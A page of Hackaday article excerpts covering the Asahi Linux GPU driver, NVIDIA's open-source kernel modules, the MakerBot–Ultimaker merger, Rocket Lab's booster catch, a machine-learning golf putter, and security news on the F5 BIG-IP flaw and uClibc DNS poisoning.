Asahi GPU Hacking

[Alyssa Rosenzweig] has been tirelessly working on reverse engineering the GPU built into Apple’s M1 architecture as part of the Asahi Linux effort. If you’re not familiar, that’s the project adding support to the Linux kernel and userspace for the Apple M1 line of products. She has made great progress, and even got primitive rendering working with her own open source code, just over a year ago.

Trying to mature the driver, however, has hit a snag. For complex rendering, something in the GPU breaks, and the frame is simply missing chunks of content. Some clever testing discovered the exact failure trigger — too much total vertex data. Put simply, it’s “the number of vertices (geometry complexity) times amount of data per vertex (‘shading’ complexity).” That… almost sounds like a buffer filling up, but on the GPU itself. This isn’t a buffer that the driver directly interacts with, so all of this sleuthing has to be done blindly. The Apple driver doesn’t have corrupted renders like this, so what’s going on?
Continue reading “Asahi GPU Hacking”

NVIDIA Releases Drivers With Openness Flavor

This year, we’ve already seen sizeable leaks of NVIDIA source code, and a release of open-source drivers for NVIDIA Tegra. It seems NVIDIA decided to amp it up, and just released open-source GPU kernel modules for Linux. The GitHub link named open-gpu-kernel-modules has people rejoicing, and we are already testing the code out, making memes and speculating about the future. This driver is currently claimed to be experimental, only “production-ready” for datacenter cards – but you can already try it out!

The Driver’s Present State

Of course, there’s nuance. This is new code, and unrelated to the well-known proprietary driver. It will only work on cards starting from RTX 2000 and Quadro RTX series (aka Turing and onward). The good news is that performance is comparable to the closed-source driver, even at this point! A peculiarity of this project – a good portion of features that AMD and Intel drivers implement in Linux kernel are, instead, provided by a binary blob from inside the GPU. This blob runs on the GSP, which is a RISC-V core that’s only available on Turing GPUs and younger – hence the series limitation. Now, every GPU loads a piece of firmware, but this one’s hefty!

Barring that, this driver already provides more coherent integration into the Linux kernel, with massive benefits that will only increase going forward. Not everything’s open yet – NVIDIA’s userspace libraries and OpenGL, Vulkan, OpenCL and CUDA drivers remain closed, for now. Same goes for the old NVIDIA proprietary driver that, I’d guess, would be left to rot – fitting, as “leaving to rot” is what that driver has previously done to generations of old but perfectly usable cards. Continue reading “NVIDIA Releases Drivers With Openness Flavor”

This Week In Security: F5 Twitter PoC, Certifried, And Cloudflare Pages Pwned

F5’s BIG-IP platform has a Remote Code Execution (RCE) vulnerability: CVE-2022-1388. This one is interesting, because a Proof of Concept (PoC) was quickly reverse engineered from the patch and released on Twitter, among other places.

HORIZON3.ai researcher [James Horseman] wrote an explainer that sums up the issue nicely. User authentication is handled by multiple layers, one being a Pluggable Authentication Modules (PAM) module, and the other internally in a Java class. In practice this means that if the PAM module sees an X-F5-Auth-Token, it passes the request on to the Java code, which then validates the token to confirm it as authentic. If a request arrives at the Java service without this header, and instead the X-Forwarded-Host header is set to localhost, the request is accepted without authentication. The F5 authentication scheme isn’t naive, and a request without the X-F5-Auth-Token header gets checked by PAM, and dropped if the authentication doesn’t check out.

So where is the wiggle room that allows for a bypass? Yet another HTTP header, the Connection header. Normally this one only comes in two varieties, Connection: close and Connection: keep-alive. Really, this header is a hint describing the connection between the client and the edge proxy, and the contents of the Connection header is the list of other headers to be removed by a proxy. It’s essentially the list of headers that only apply to the connection over the internet. Continue reading “This Week In Security: F5 Twitter PoC, Certifried, And Cloudflare Pages Pwned”

MakerBot And Ultimaker To Merge, Focus On Industry

Nine years ago, MakerBot was acquired by Stratasys in a deal worth slightly north of $600 million. At the time it was assumed that MakerBot’s line of relatively affordable desktop 3D printers would help Stratasys expand its reach into the hobbyist market, but in the end, the company all but disappeared from the hacker and maker scene. Not that many around these parts were sad to see them go — by abandoning the open source principles the company had been built on, MakerBot had already fallen out of the community’s favor by the time the buyout went through.

So today’s announcement that MakerBot and Ultimaker have agreed to merge into a new 3D printing company is a bit surprising, if for nothing else because it seemed MakerBot had transitioned into a so-called “zombie brand” some time ago. In a press conference this afternoon it was explained that the new company would actually be spun out of Stratasys, and though the American-Israeli manufacturer would still own a sizable chunk of the as of yet unnamed company, it would operate as its own independent entity.

MakerBot has been courting pro users for years.

In the press conference, MakerBot CEO Nadav Goshen and Ultimaker CEO Jürgen von Hollen explained that the plan was to maintain the company’s respective product lines, but at the same time, expand into what they referred to as an untapped “light industrial” market. By combining the technology and experience of their two companies, the merged entity would be uniquely positioned to deliver the high level of reliability and performance that customers would demand at what they estimated to be a $10,000 to $20,000 USD price point.

When MakerBot announced their new Method 3D printer would cost $6,500 back in 2018, it seemed clear they had their eyes on a different class of clientele. But now that the merged company is going to put their development efforts into machines with five-figure price tags, there’s no denying that the home-gamer market is officially in their rear-view mirror. That said, absolutely zero information was provided about the technology that would actually go into said printers, although given their combined commercial experience, it seems all but a given that these future machines will use some form of fused deposition modeling (FDM).

Now we’d hate to paint with too broad a brush, but we’re going to assume that the average Hackaday reader isn’t in the market for a 3D printer that costs as much as a decent used car. But there’s an excellent chance you’re interested in at least two properties that will fall under the umbrella of this new printing conglomerate: MakerBot’s Thingiverse, and Ultimaker’s Cura slicer. In the press conference it was made clear that everyone involved recognized both projects as vital outreach tools, and that part of the $62.4 million cash investment the new company is set to receive has been set aside specifically for their continued development and improvement.

We won’t beat around the bush — Thingiverse has been an embarrassment for years, even before they leaked the account information of a quarter million users because of their antiquated back-end. A modern 3D model repository run by a company the community doesn’t openly dislike has been on many a hacker’s wish list for some time now, but we’re not against seeing the service get turned around by a sudden influx of cash, either. We’d also be happy to see more funding go Cura’s way as well, so long as it’s not saddled with the kind of aggressive management that’s been giving Audacity users a headache. Here’s hoping the new company, whatever it ends up being called, doesn’t forget about the promises they’re making to the community — because we certainly won’t.

With Rocket Lab’s Daring Midair Catch, Reusable Rockets Go Mainstream

We’ve all marveled at the videos of SpaceX rockets returning to their point of origin and landing on their spindly deployable legs, looking for all the world like something pulled from a 1950s science fiction film.  On countless occasions founder Elon Musk and president Gwynne Shotwell have extolled the virtues of reusable rockets, such as lower operating cost and the higher reliability that comes with each booster having a flight heritage. At this point, even NASA feels confident enough to fly their missions and astronauts on reused SpaceX hardware.

Even so, SpaceX’s reusability program has remained an outlier, as all other launch providers have stayed the course and continue to offer only expendable booster rockets. Competitors such as United Launch Alliance and Blue Origin have teased varying degrees of reusability for their future vehicles, but to date have nothing to show for it beyond some flashy computer-generated imagery. All the while SpaceX continues to streamline their process, reducing turnaround time and refurbishment costs with each successful reuse of a Falcon 9 booster.

But that changed earlier this month, when a helicopter successfully caught one of Rocket Lab’s Electron boosters in midair as it fell back down to Earth under a parachute. While calling the two companies outright competitors might be a stretch given the relative sizes and capabilities of their boosters, SpaceX finally has a sparing partner when it comes to the science of reusability. The Falcon 9 has already smashed the Space Shuttle’s record turnaround time, but perhaps Rocket Lab will be the first to achieve Elon Musk’s stated goal of re-flying a rocket within 24 hours of its recovery.

Continue reading “With Rocket Lab’s Daring Midair Catch, Reusable Rockets Go Mainstream”

A putter with an Arduino attached to its shaft

This Golf Club Uses Machine Learning To Perfect Your Swing

Golf can be a frustrating game to learn: it takes countless hours of practice to get anywhere near the perfect swing. While some might be lucky enough to have a pro handy every time they’re on the driving range or putting green, most of us will have to get by with watching the ball’s motion and using that to figure out what we’re doing wrong.

Luckily, technology is here to help: [Nick Bild]’s Golf Ace is a putter that uses machine learning to analyze your swing. An accelerometer mounted on the shaft senses the exact motion of the club and uses a machine learning algorithm to see how closely it matches a professional’s swing. An LED mounted on the club’s head turns green if your stroke was good, and red if it wasn’t. All of this is driven by an Arduino Nano 33 IoT and powered by a lithium-ion battery.

The Golf Ace doesn’t tell you what part of your swing to improve, so you’d still need some external instruction to help you get closer to the ideal form; [Nick]’s suggestion is to bundle an instructor’s swing data with a book or video that explains the important points. That certainly looks like a reasonable approach to us, and we can also imagine a similar setup to be used on woods and irons, although that would require a more robust mounting system.

In any case, the Golf Ace could very well be a useful addition to the many gadgets that try to improve your game. But in case you still end up frustrated, you might want to try this automated robotic golf club.

Continue reading “This Golf Club Uses Machine Learning To Perfect Your Swing”

This Week In Security: UClibc And DNS Poisoning, Encryption Is Hard, And The Goat

DNS spoofing/poisoning is the attack discovered by [Dan Kaminski] back in 2008 that simply refuses to go away. This week a vulnerability was announced in the uClibc and uClibc-ng standard libraries, making a DNS poisoning attack practical once again.

So for a quick refresher, DNS lookups generally happen over unencrypted UDP connections, and UDP is a stateless connection, making it easier to spoof. DNS originally just used a 16-bit transaction ID (TXID) to validate DNS responses, but [Kaminski] realized that wasn’t sufficient when combined with a technique that generated massive amounts of DNS traffic. That attack could poison the DNS records cached by public DNS servers, greatly amplifying the effect. The solution was to randomize the UDP source port used when sending UDP requests, making it much harder to “win the lottery” with a spoofed packet, because both the TXID and source port would have to match for the spoof to work.

uClibc and uClibc-ng are miniature implementations of the C standard library, intended for embedded systems. One of the things this standard library provides is a DNS lookup function, and this function has some odd behavior. When generating DNS requests, the TXID is incremental — it’s predictable and not randomized. Additionally, the TXID will periodically reset back to it’s initial value, so not even the entire 16-bit key space is exercised. Not great. Continue reading “This Week In Security: UClibc And DNS Poisoning, Encryption Is Hard, And The Goat”